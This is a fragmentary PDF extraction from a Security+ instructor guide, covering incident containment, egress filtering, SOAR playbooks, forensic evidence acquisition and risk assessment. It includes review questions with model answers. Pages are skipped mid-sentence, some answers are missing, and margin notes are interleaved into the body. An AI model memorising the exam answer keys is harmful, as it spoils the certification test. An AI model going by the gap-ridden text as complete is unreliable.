Finally, isolation could also refer to disabling a user account or application service.
Temporarily disabling users' network accounts may prove helpful in containing damage
if an intruder is detected within the network. Without privileges to access resources, an
intruder will not be able to further damage or steal information from the organization.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
476 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Applications that you suspect may be the vector of an attack can be much less effective
to the attacker if the application is prevented from executing on most hosts.
Segmentation-Based Containment
Segmentation-based containment is a means of achieving the isolation of a host
or group of hosts using network technologies and architecture. Segmentation uses
VLANs, routing/subnets, and firewall ACLs to prevent a host or group of hosts from
communicating outside the protected segment. As opposed to completely isolating the
hosts, you might configure the protected segment as a sinkhole or honeynet and allow
the attacker to continue to receive filtered (and possibly modified) output over the
C&C channel to deceive him or her into thinking the attack is progressing successfully.
Analysis of the malware code by reverse engineering it could provide powerful
deception capabilities. You could intercept the function calls made by malware to allow
the adversary to believe an attack is proceeding while building detailed knowledge of
their tactics and (hopefully) identity. Attribution of the attack to a particular group will
allow an estimation of adversary capability.
If reinstalling from baseline template configurations or images, make sure that there is
nothing in the baseline that allowed the incident to occur! If so, update the template before
rolling it out again.
2. Reaudit security controls—ensure they are not vulnerable to another attack. This
could be the same attack or from some new attack that the attacker could launch
through information they have gained about your network.
If your organization is subjected to a targeted attack, be aware that one incident may be
very quickly followed by another.
3. Ensure that affected parties are notified and provided with the means to
remediate their own systems. For example, if customers' passwords are stolen,
they should be advised to change the credentials for any other accounts where
that password might have been used (not good practice, but most people do it).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 477
change may mean the deployment of a new type of security control, or altering the
settings of an existing control to make it more effective.
Historically, many organizations focused on ingress filtering rules, designed to
prevent local network penetration from the Internet. In the current threat landscape,
it is imperative to also apply strict egress filtering rules to prevent malware that has
infected internal hosts by other means from communicating out to C&C servers. Egress
filtering can be problematic in terms of interrupting authorized network activity, but it
is an essential component of modern network defense. Some general guidelines for
configuring egress filtering are:
• Allow only authorized application ports and, if possible, restrict the destination
addresses to authorized Internet hosts. Where authorized hosts cannot be
identified or a default deny is too restrictive, use URL and content filtering to try to
detect malicious traffic over authorized protocols.
• Restrict DNS lookups to your own or your ISP's DNS services or authorized public
resolvers, such as Google's or Quad9's DNS services.
• Block access to "known bad" IP address ranges, as listed on don't route or peer
(DROP) filter lists.
• Block access from any IP address space that is not authorized for use on your
local network.
• Block all Internet access from host subnets that do not need to connect to the
Internet, such as most types of internal server, workstations used to manage
industrial control systems (ICSs), and so on.
Even within these rules, there is a lot of scope for threat actors to perform command
signaling and exfiltration. For example, cloud services, such as content delivery
networks and social media platforms, can be used to communicate scripts and
malware commands and to exfiltrate data over HTTPS (rhinosecuritylabs.com/aws/
hiding-cloudcobalt-strike-beacon-c2-using-amazon-apis).
The limitations of a basic packet filtering firewall (even if it is stateful) mean that some Content Filter
sort of content filtering application proxy may provide better security. These types of Configuration Changes
appliances are usually referred to as secure web gateways (SWGs). A SWG mediates
user access to Internet services, with the ability to block content from regularly
updated URL/domain/IP blacklists and perform intrusion detection/prevention on
traffic based on matching content in application layer protocol headers and payloads.
If a SWG is already in place, an attacker may have found a way to circumvent it via
some sort of backdoor. The network configuration should be checked and updated
to ensure that all client access to the Internet must pass through the SWG. Another
possibility is that the attacker is using a protocol or C&C method that is not filtered.
The SWG should be updated with scripts and data, domains and IP addresses, that will
block the exploit.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
478 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Vulnerabilities—if the malware exploited a software fault, either install the patch or
isolate the system until a patch can be developed.
• Lack of security controls—if the attack could have been prevented by endpoint
protection/A-V, host firewall, content filtering, DLP, or MDM, investigate the
possibility of deploying them to the endpoint. If this is not practical, isolate the
system from being exploited by the same vector.
• Weak configuration—if the configuration was correctly applied, but was exploited
anyway, review the template to devise more secure settings. Make sure the
template is applied to similar hosts.
• A block list (or deny list) generally allows execution, but explicitly prohibits listed
processes.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 479
You will need to update the contents of allow lists and block lists in response to
incidents and as a result of ongoing threat hunting and monitoring. Threat hunting
may also provoke a strategic change. For example, if you rely principally on explicit
denies, but your systems are subject to numerous intrusions, you will have to consider
adopting a "least privileges" model and using a deny-unless-listed approach. This sort
of change has the potential to be highly disruptive however, so it must be preceded by
a risk assessment and business impact analysis.
Execution control can also be tricky to configure effectively, with many opportunities
for threat actors to evade the controls. Detailed analysis of the attack might show the
need for changes to the existing mechanism, or the use of a more robust system.
Quarantine
If mitigating techniques are not successful, or the results are uncertain, the endpoint
will require careful management before being integrated back onto the network. If
further evidence needs to be gathered, the best approach may be to quarantine or
sandbox the endpoint or suspect process/file. This allows for analysis of the attack or
tool and collection of evidence using digital forensic techniques.
Automation is the action of scripting a single activity, while orchestration is the action of Security Orchestration,
coordinating multiple automations (and possibly manual activity) to perform a complex, Automation, and
multistep task. In the case of security orchestration, automation, and response Response
(SOAR), this task is principally incident response, though the technologies can also be
used for tasks such as threat hunting too. SOAR is designed as a solution to the problem
of the volume of alerts overwhelming analysts' ability to respond, measured as the
mean time to respond (MTTR). A SOAR may be implemented as a standalone technology
or integrated with a SIEM—often referred to as a next-gen SIEM. The basis of SOAR
is to scan the organization's store of security and threat intelligence, analyze it using
machine/deep learning techniques, and then use that data to automate and provide data
enrichment for the workflows that drive incident response and threat hunting. It can also
assist with provisioning tasks, such as creating and deleting user accounts, making shares
available, or launching VMs from templates, to try to eliminate configuration errors. The
SOAR will use technologies such as cloud and SDN/SDV APIs, orchestration tools, and
cyberthreat intelligence (CTI) feeds to integrate the different systems that it is managing.
It will also leverage technologies such as automated malware signature creation and user
and entity behavior analytics (UEBA) to detect threats.
An incident response workflow is usually defined as a playbook. A playbook is a
checklist of actions to perform to detect and respond to a specific type of incident. A
playbook should be made highly specific by including the query strings and signatures
that will detect a particular type of incident. A playbook will also account for compliance
factors, such as whether an incident must be reported as a breach plus when and
to whom notification must be made. Where a playbook is implemented with a high
degree of automation from a SOAR system, it can be referred to as a runbook, though
the terms are also widely used interchangeably. The aim of a runbook is to automate
as many stages of the playbook as possible, leaving clearly defined interaction points
for human analysis. These interaction points should try to present all the contextual
information and guidance needed for the analyst to make a quick, informed decision
about the best way to proceed with incident mitigation.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
480 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A Microsoft presentation at BlackHat illustrates some of the techniques that can be used
to mitigate adversarial AI (i.blackhat.com/us-18/Thu-August-9/us-18-Parikh-Protecting-the-
Protector-Hardening-Machine-Learning-Defenses-Against-Adversarial-Attacks.pdf).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 481
Review Activity:
Mitigation Controls
Answer the following questions:
This task is suited to data loss prevention (DLP), which can block the transfer of tagged
content over unauthorized channels.
4. A threat actor gained access to a remote network over a VPN. Later, you
discover footage of the user of the hacked account being covertly filmed
while typing their password. What type of endpoint security solution might
have prevented this breach?
A mobile device management (MDM) suite can prevent use of the camera function of a
smartphone.
6. You are investigating a client workstation that has not obtained updates to
its endpoint protection software for days. On the workstation you discover
thousands of executable files with random names. The local endpoint log
reveals that all of them have been scanned and identified as malware. You
can find no evidence of any further intrusion on the network. What is the
likely motive of the threat actor?
This could be an offline tainted data attack against the endpoint software's
identification engine.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
482 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 17
Summary
Teaching You should be able explain the process and procedures involved in effective incident
Tip response and implement strategies to remediate intrusion events.
Check that students
are confident about
the content that has
Guidelines for Performing Incident Response
been covered. If there
Follow these guidelines for developing or improving incident response policies and
is time, revisit any
content examples that procedures:
they have questions • Identify goals for implementing structured incident response, following the
about. If you have
used all the available preparation, identification, containment, eradication, recovery, and lessons
time for this lesson learned steps.
block, note the issues,
and schedule time for • Prepare for effective incident response by creating a CIRT/CERT/CSIRT with suitable
a review later in the communications resources and policies.
course.
• Develop an incident classification system and prepare IRPs and playbooks for
Interaction distinct incident scenarios, using attack frameworks (kill chain, Diamond Model, and
Opportunity MITRE ATT&CK) to facilitate analysis.
Use this as an
opportunity for • Consider whether implementing SOAR and automated runbooks could provide
students to share more effective response, taking care to protect AI-backed systems from tainted
their real-world training data attacks.
experiences with
security incidents. You • Configure SIEM or syslog to aggregate appropriate data sources and develop
may also encourage
correlation rules display alerts, status indicators, and trend analysis via dashboards:
them to brainstorm
appropriate responses
• Host log file data sources (network, system, security, vulnerability scan output).
to hypothetical
scenarios. Consider
• Application log file data sources (DNS, web, VoIP).
recording the
incidents and
• Network packet and intrusion detection data.
responses for
review, and present
• Network traffic and protocol flow statistics.
additional content
to see if students
• Integrate incident response containment, eradication, and recovery processes
would want to change
the responses they with procedures for forensic evidence collection, disaster recovery, and business
provided. continuity.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 18
Explaining Digital Forensics
Lesson Objectives
In this lesson, you will:
• Explain key aspects of digital forensics documentation.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
484 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 18A
Explain Key Aspects of Digital
Forensics Documentation
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 485
Legal Hold
Legal hold refers to the fact that information that may be relevant to a court case
must be preserved. Information subject to legal hold might be defined by regulators
or industry best practice, or there may be a litigation notice from law enforcement or
lawyers pursuing a civil action. This means that computer systems may be taken as
evidence, with all the obvious disruption to a network that entails.
Chain of Custody
Chain of custody documentation reinforces the integrity and proper handling of
evidence from collection, to analysis, to storage, and finally to presentation. When
security breaches go to trial, the chain of custody protects an organization against
accusations that evidence has either been tampered with or is different than it was
when it was collected. Every person in the chain who handles evidence must log the
methods and tools they used.
A digital forensics report summarizes the significant contents of the digital data and the Digital Forensics
conclusions from the investigator's analysis. It is important to note that strong ethical Reports
principles must guide forensics analysis.
• Analysis must be performed without bias. Conclusions and opinions should be
formed only from the direct evidence under analysis.
• Analysis methods must be repeatable by third parties with access to the same
evidence.
Defense counsel may try to use any deviation of good ethical and professional behavior
to have the forensics investigator's findings dismissed.
A forensic examination of a device such as a fixed drive that contains Electronically E-discovery
Stored Information (ESI) entails a search of the whole drive (including both allocated
and unallocated sectors, for instance). E-discovery is a means of filtering the relevant
evidence produced from all the data gathered by a forensic examination and storing
it in a database in a format such that it can be used as evidence in a trial. E-discovery
software tools have been produced to assist this process. Some of the functions of
e-discovery suites are:
• Identify and de-duplicate files and metadata—many files on a computer system are
"standard" installed files or copies of the same file. E-discovery filters these types of
files, reducing the volume of data that must be analyzed.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
486 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Security—at all points evidence must be shown to have been stored, transmitted,
and analyzed without tampering.
• Disclosure—an important part of trial procedure is that the same evidence be made
available to both plaintiff and defendant. E-discovery can fulfill this requirement.
Recent court cases have required parties to a court case to provide searchable ESI
rather than paper records.
Remember that if the matter comes to trial, the trial could take place months or years after
the event. It is vital to record impressions and actions in notes. Also consider that in-place
CCTV systems or webcams might have captured valuable evidence.
If possible, evidence is gathered from the live system using forensic software tools. It is
vital that these tools do as little to modify the digital data that they capture as possible.
As well as digital evidence, an investigator should interview witnesses to establish
what they were doing at the scene, whether they observed any suspicious behavior or
activity, and also to gather information about the computer system. An investigator
might ask questions informally and record the answers as notes to gain an initial
understanding of the circumstances surrounding an incident. An investigator must
ask questions carefully, to ensure that the witness is giving reliable information and
to avoid leading the witness to a particular conclusion. Making an audio or video
recording of witness statements produces a more reliable record but may make
witnesses less willing to make a statement. If a witness needs to be compelled to make
a statement, there will be legal issues around employment contracts (if the witness is
an employee) and right to legal representation.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 487
Digital evidence is not just drawn from analysis of host system memory and data Event Logs and
drives. An investigation may also obtain the event logs for one or more network Network Traffic
appliances and/or server hosts. Similarly, network packet captures and traces/flows
might provide valuable evidence. On a typical network, sensor and logging systems are
not configured to record all network traffic, as this would generate a very considerable
amount of data. On the other hand, an organization with sufficient IT resources could
choose to preserve a huge amount of data. A Retrospective Network Analysis (RNA)
solution provides the means to record network events at either a packet header or
payload level.
For forensics, data records that are not supported by physical evidence (a data drive)
must meet many tests to be admissible in court. For event logs, the drives might not
be accessible or might no longer hold the original logs; for network traffic, there is no
physical evidence. Where logs and network traffic are captured in a SIEM, the SIEM
should demonstrate accuracy (that all relevant data was captured) and integrity (that
neither party could have tampered with the data).
In some cases, an organization may conduct a forensics investigation without the Strategic
expectation of legal action. As well as being used in a legal process, forensics has a Intelligence and
role to play in cybersecurity. It enables the detection of past intrusions or ongoing but Counterintelligence
unknown intrusions by close examination of available digital evidence. A famous quote
attributed to former Cisco CEO John Chambers illustrates the point: "There are two
types of companies: those that have been hacked, and those who don't know they have
been hacked."
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
488 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Digital forensics can be used for information gathering to protect against espionage
and hacking. This intelligence is deployed in two different ways:
• Counterintelligence—identification and analysis of specific adversary tactics,
techniques, and procedures (TTP) provides information about how to configure
and audit active logging systems so that they are most likely to capture evidence of
attempted and successful intrusions.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 489
Review Activity:
Digital Forensics Documentation
Answer the following questions:
The evidence cannot be seen directly but must be interpreted so the validity of the
interpreting process must be unquestionable.
3. Why might a file time stamp not show the time at which a crime was
committed?
The time stamp may record the Universal Coordinated Time rather than the local time.
An offset would need to be applied (and it might need to be demonstrated that the
computer's time zone was correctly set).
4. You've fulfilled your role in the forensic process and now you plan on
handing the evidence over to an analysis team. What important process
should you observe during this transition, and why?
It's important to uphold a record of how evidence is handled in a chain of custody. The
chain of custody will help verify that everyone who handled the evidence is accounted
for, including when the evidence was in each person's custody. This is an important
tool in validating the evidence's integrity.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
490 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 18B
Explain Key Aspects of Digital Forensics
Evidence Acquisition
3. Data on persistent mass storage devices (HDDs, SSDs, and flash memory devices):
• Partition and file system blocks, slack space, and free space.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 491
The Windows registry is mostly stored on disk, but there are keys—notably HKLM\
Hardware—that only ever exist in memory. The contents of the registry can be analyzed via
a memory dump.
Digital forensics software is designed to assist the acquisition, documentation, and Digital Forensics
analysis of digital evidence. Most of the commercial forensics tools are available for the Software
Windows platform only.
• EnCase Forensic is a digital forensics case management product created by
Guidance Software (guidancesoftware.com/encase-forensic?cmpid=nav_r). Case
management is assisted by built-in pathways, or workflow templates, showing the
key steps in diverse types investigation. In addition to the core forensics suite, there
are separate products for e-discovery (digital evidence management) and Endpoint
Investigator (for over the network analysis of corporate desktops and servers).
• The Sleuth Kit (sleuthkit.org) is an open-source collection of command line tools System Memory
and programming libraries for disk imaging and file analysis. Autopsy is a graphical Acquisition
front-end for these tools and acts as a case management/workflow tool. The
program can be extended with plug-ins for various analysis functions. Autopsy is Teaching
available for Windows and can be compiled from the source code to run on Linux. Tip
Remind students
• WinHex from X-Ways (x-ways.net/winhex) is a commercial tool for forensic recovery that there is no
and analysis of binary data, with support for a range of file systems and memory physical evidence
dump types (depending on version). to validate a system
memory image, so
• The Volatility Framework (github.com/volatilityfoundation/volatility) is widely used the provenance of the
for system memory analysis. capture can only be
established by video
recording the process.
System Memory Acquisition Note that one of the
functions of EDR
System memory is volatile data held in Random Access Memory (RAM) modules. is to perform live
Volatile means that the data is lost when power is removed. A system memory memory capture when
suspicious activity is
dump creates an image file that can be analyzed to identify the processes that are detected (carbonblack.
running, the contents of temporary file systems, registry data, network connections, com/blog/using-
cryptographic keys, and more. It can also be a means of accessing data that is carbon-black-with-
encrypted when stored on a mass storage device. There are various methods of volatility-for-detecting-
collecting the contents of system memory. memory-attacks).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
492 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Viewing the process list in a memory dump using the Volatility Framework.
(Screenshot Volatility Framework volatilityfoundation.org.)
Live Acquisition
A specialist hardware or software tool can capture the contents of memory while the
host is running. Unfortunately, this type of tool needs to be preinstalled as it requires a
kernel mode driver to dump any data of interest. Some examples for Windows include
WinHex (x-ways.net/winhex), Memoryze from FireEye (fireeye.com/services/freeware/
memoryze.html), and F-Response TACTICAL (f-response.com/software/tac).
On Linux, a user mode tool, such as memdump (porcupine.org/forensics/tct.html)
or dd, can be run against the /dev/mem device file. However, on most modern
distributions, access to this file is blocked. The Volatility Framework (github.com/
volatilityfoundation/volatility) includes a tool to install a kernel driver (pmem).
The fmem and LiME kernel utilities provide similar functionality.
Crash Dump
When Windows encounters an unrecoverable kernel error, it can write contents of
memory to a dump file at C:\Windows\MEMORY.DMP. On modern systems, there is
unlikely to be a complete dump of all the contents of memory, as these could take up
a lot of disk space. However, even mini dump files, stored in C:\Windows\Minidumps,
may be a valuable source of information.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 493
The pagefile/swap file/swap partition stores pages of memory in use that exceed
the capacity of the host's RAM modules. The pagefile is not structured in a way that
analysis tools can interpret, but it is possible to search for strings.
Disk image acquisition refers to acquiring data from nonvolatile storage. Nonvolatile Disk Image Acquisition
storage includes hard disk drives (HDDs), solid state drives (SSDs), firmware, other
types of flash memory (USB thumb drives and memory cards), and optical media (CD,
DVD, and Blu-Ray). This can also be referred to as device acquisition, meaning the SSD
storage in a smartphone or media player. Disk acquisition will also capture the OS
installation, if the boot volume is included.
There are three device states for persistent storage acquisition:
• Live acquisition—this means copying the data while the host is still running. This
may capture more evidence or more data for analysis and reduce the impact on
overall services, but the data on the actual disks will have changed, so this method
may not produce legally acceptable evidence. It may also alert the adversary and
allow time for them to perform anti-forensics.
• Static acquisition by shutting down the host—this runs the risk that the malware will
detect the shutdown process and perform anti-forensics to try to remove traces of
itself.
• Static acquisition by pulling the plug—this means disconnecting the power at the
wall socket (not the hardware power-off button). This is most likely to preserve the
storage devices in a forensically clean state, but there is the risk of corrupting data.
Given sufficient time at the scene, you may decide to perform both a live and static
acquisition. Whichever method is used, it is imperative to document the steps taken
and supply a timeline for your actions.
There are many GUI imaging utilities, including those packaged with suites such as the
Forensic Toolkit and its FTK Imager. You should note that the EnCase forensics suite
uses a vendor file format (.e01) compared to the raw file format used by Linux tools
like dd. The file format is important when it comes to selecting a tool for analyzing the
image. The .eo1 format allows image metadata (such as the checksum, drive geometry,
and acquisition time) to be stored within the same file. The open-source Advanced
Forensic Format (AFF) provides similar features.
If no specialist tool is available, on a Linux host you can use the dd command to make
a copy of an input file (if=) to an output file (of=) and apply optional conversions to
the file data. In the following sda is the fixed drive:
dd if=/dev/sda of=/mnt/usbstick/backup.img
A more recent fork of dd is dcfldd, which provides additional features like multiple
output files and exact match verification.
Using dcfldd (a version of dd with additional forensics functionality created by the DoD)
and generating a hash of the source-disk data (sda).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
494 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
3. A second hash is then made of the image, which should match the original hash
of the media.
4. A copy is made of the reference image, validated again by the checksum. Analysis
is performed on the copy.
In practical terms, the image acquisition software will perform the verification steps as part
of the acquisition process, but in theory you could use separate tools to perform each stage
individually.
Preservation of Evidence
The host devices and media taken from the crime scene should be labeled, bagged,
and sealed, using tamper-evident bags. It is also appropriate to ensure that the
bags have antistatic shielding to reduce the possibility that data will be damaged
or corrupted on the electronic media by electrostatic discharge (ESD). Each piece of
evidence should be documented by a chain of custody form which records where,
when, and who collected the evidence, who subsequently handled it, and where it
was stored.
The evidence should be stored in a secure facility; this not only means access control,
but also environmental control, so that the electronic systems are not damaged by
condensation, ESD, fire, and other hazards. Similarly, if the evidence is transported, the
transport must also be secure.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 495
Network
Packet captures and traffic flows can contain very valuable evidence, if the capture was
running at the right time and in the right place to record the incident. As with memory
forensics, the issue for forensics lies in establishing the integrity of the data. Most
network data will come from a SIEM.
Cache
Cache can refer either to hardware components or software. Software-based cache is
stored in the file system and can be acquired as part of a disk image. For example, each
brower has a cache of temporary files, and each user profile has a cache of temp files.
Some cache artifacts generated by the OS and applications are held in memory only,
such as portions of the registry, cryptographic keys, password hashes, some types of
cookies, and so on. The contents of hardware cache (CPU registers and disk controller
read/write cache, for instance) is not generally recoverable.
Using Autopsy for file carving a disk image. The selected Courses folder and the PDF files in it were deleted
and so are flagged as unallocated. Because this image was captured soon after deletion, the file contents
are easily recoverable, however. (Screenshot Autopsy—the Sleuth Kit sleuthkit.org/autopsy.)
Snapshot
A snapshot is a live acquisition image of a persistent disk. While this may have less
validity than an image taken from a device using a write blocker, it may be the only
means of acquiring data from a virtual machine or cloud process.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
496 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Firmware
Firmware is usually implemented as flash memory. Some types, such as the PC
firmware, can potentially be extracted from the device or from system memory using
an imaging utility. It likely will be necessary to use specialist hardware to attach the
device to a forensic workstation, however.
• Chain of custody issues are complex and might have to rely on the CSP to select and
package data for you. The process should be documented and recorded as closely
as is possible.
• Jurisdiction and data sovereignty may restrict what evidence the CSP is willing to
release to you.
• If the CSP is a data processor, it will be bound by data breach notification laws and
regulations. Coordinating the timing of notification and contact with the regulator
between your organization and the CSP can be extremely complex, especially if
there is an ongoing incident requiring confidentiality.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 497
Review Activity:
Digital Forensics Evidence Acquisition
Answer the following questions:
1. You must recover the contents of the ARP cache as vital evidence of a man-
in-the-middle attack. Should you shut down the PC and image the hard drive
to preserve it?
No, the ARP cache is stored in memory and will be discarded when the computer is
powered off. You can either dump the system memory or run the arp utility and make
a screenshot. In either case, make sure that you record the process and explain your
actions.
2. Which command line tool allows image creation from disk media on any
Linux host?
3. True or false? To ensure evidence integrity, you must make a hash of the
media before making an image.
True.
A carving tool allows close inspection of an image to locate artifacts. Artifacts are data
objects and structures that are not obvious from examination by ordinary file browsing
tools, such as alternate data streams, cache entries, and deleted file remnants.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
498 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 18
Summary
Teaching You should be able to explain key aspects of digital forensics, including the secure
Tip acquisition and handling of evidence.
Check that students
are confident about
the content that has
Guidelines for Digital Forensics
been covered. If there Follow these guidelines for supporting forensics investigations:
is time, revisit any
content examples that • Develop or adopt a consistent process for incident responders to handle and
they have questions preserve forensic data:
about. If you have
used all the available • Consider the order of volatility and potential loss of evidence if a host is shut
time for this lesson
down or powered off.
block, note the issues,
and schedule time for
• Record evidence collection using video and interview witnesses to gather
a review later in the
course. statements.
• Deploy tools, such as WinHex, Autopsy, or FTK Imager, that can capture and
validate evidence from persistent and nonpersistent media.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 19
Summarizing Risk
Management Concepts
Lesson Objectives
In this lesson, you will:
• Explain risk management processes and concepts.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
500 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 19A
Explain Risk Management
Processes and Concepts
3. Identify threats—for each function or workflow, identify the threat sources and
actors that may take advantage of or exploit or accidentally trigger vulnerabilities.
For each business process and each threat, you must assess the degree of risk that
exists. Calculating risk is complex, but the two main variables are likelihood and impact:
• Likelihood of occurrence is the probability of the threat being realized.
• Impact is the severity of the risk if realized as a security incident. This may be
determined by factors such as the value of the asset or the cost of disruption if the
asset is compromised.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 501
Risk management is complex and treated very differently in companies and institutions
of different sizes, and with different regulatory and compliance requirements. Most
companies will institute enterprise risk management (ERM) policies and procedures,
based on frameworks such as NIST's Risk Management Framework (RMF) or ISO 31K.
These legislative and framework compliance requirements are often formalized as
a Risk and Control Self-Assessment (RCSA). An organization may also contract an
external party to lead the process, in which case it is referred to as a Risk and Control
Assessment (RCA).
A RCSA is an internal process undertaken by stakeholders to identify risks and the
effectiveness with which controls mitigate those risks. RCSAs are often performed
through questionnaires and workshops with department managers. The outcome of an
RCSA is a report. Up-to-date RCSA reports are critical to the external audit process.
General types of risks can be identified as arising from specific threat and vulnerability Risk Types
scenarios.
External
External threat actors are one highly visible source of risk. You must also consider
wider threats than those of cyberattack. Natural disasters, such as the COVID-19
pandemic, illustrate the need to have IT systems and workflows that are resilient to
widespread dislocation. The most critical type of impact is one that could lead to loss
of life or critical injury. The most obvious risks to life and safety come from natural
disasters, person-made disasters, and accidents, such as fire.
Internal
Internal risks come from assets and workflows that are owned and managed by your
organization. When reviewing internal risks, it is important to remember that these can
be classed as malicious and accidental or non-malicious. Internal threats can include
contractors granted temporary access.
Multiparty
Multiparty risk is where an adverse event impacts multiple organizations. Multiparty
risk usually arises from supplier relationships. If a critical event disrupts a supplier or
customer, then your own organization will suffer. These are often described as ripple
impacts. For example, if one of your top five customers goes out of business because
of a data breach, your company will lose substantial revenue. Organizations in these
supply chain relationships have an interest in promoting cybersecurity awareness and
capability throughout the chain.
As an illustration of how risk assessments can change in view of multiparty
relationship, consider a company that makes wireless adapters, originally for use
with laptops. In the original usage, the security of the firmware upgrade process is
important, but it has no impact on life or safety. The company, however, earns a
new contract to supply the adapters to provide connectivity for in-vehicle electronics
systems. Unknown to the company, a weakness in the design of the in-vehicle system
allows an adversary to use compromised wireless adapter firmware to affect the car's
control systems. The integrity of the upgrade process now has an impact on safety, and
is much higher risk.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
502 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
music) and product designs and patents. If IP data is exfiltrated it will lose much of its
commercial value. Losses can be very difficult to recover in territories where there are
not strong legal protections.
Software Compliance/Licensing
Breaking the terms of the end user licensing agreement (EULA) that imposes conditions
on installation of the software can expose the computer owner to substantial fines.
License issues are most likely to arise from shadow IT, where users install software
without change control approval. Network inventory management suites can report
software installations on each host and correlate those with the number of license
seats purchased. Licensing models can also be complex, especially where virtualization
and the cloud are concerned. It is important to train the administrative staff on the
specific license terms for each product.
Legacy Systems
Legacy systems are a source of risk because they no longer receive security updates
and because the expertise to maintain and troubleshoot them is a scarce resource.
Teaching
Tip
Students need to learn
these metrics.
Quantitative risk assessment aims to assign concrete values to each risk factor. (Image © 123RF.com.)
Quantitative risk assessment aims to assign concrete values to each risk factor.
• Single Loss Expectancy (SLE)—the amount that would be lost in a single
occurrence of the risk factor. This is determined by multiplying the value of the
asset by an Exposure Factor (EF). EF is the percentage of the asset value that would
be lost.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 503
• Annualized Loss Expectancy (ALE)—the amount that would be lost over the
course of a year. This is determined by multiplying the SLE by the Annualized Rate
of Occurrence (ARO).
It is important to realize that the value of an asset does not refer solely to its material
value. The two principal additional considerations are direct costs associated with the
asset being compromised (downtime) and consequent costs to intangible assets, such
as the company's reputation. For example, a server may have a material cost of a few
hundred dollars. If the server were stolen, the costs incurred from not being able to
do business until it can be recovered or replaced could run to thousands of dollars.
In addition, that period of interruption where orders cannot be taken or go unfulfilled
leads customers to look at alternative suppliers, resulting in perhaps more thousands
of lost sales and goodwill.
The problem with quantitative risk assessment is that the process of determining and
assigning these values is complex and time consuming. The accuracy of the values
assigned is also difficult to determine without historical data (often, it has to be based
on subjective guesswork). However, over time and with experience, this approach can
yield a detailed and sophisticated description of assets and risks and provide a sound
basis for justifying and prioritizing security expenditure.
Qualitative risk assessment avoids the complexity of the quantitative approach and Qualitative Risk
is focused on identifying significant risk factors. The qualitative approach seeks out Assessment
people's opinions of which risk factors are significant. Assets and risks may be placed
in simple categories. For example, assets could be categorized as Irreplaceable, High
Value, Medium Value, and Low Value; risks could be categorized as one-off or recurring
and as Critical, High, Medium, and Low probability.
Another simple approach is the heat map or "Traffic Light" impact matrix. For each risk,
a simple Red, Yellow, or Green indicator can be put into each column to represent the
severity of the risk, its likelihood, cost of controls, and so on. This approach is simplistic
but does give an immediate impression of where efforts should be concentrated to
improve security.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
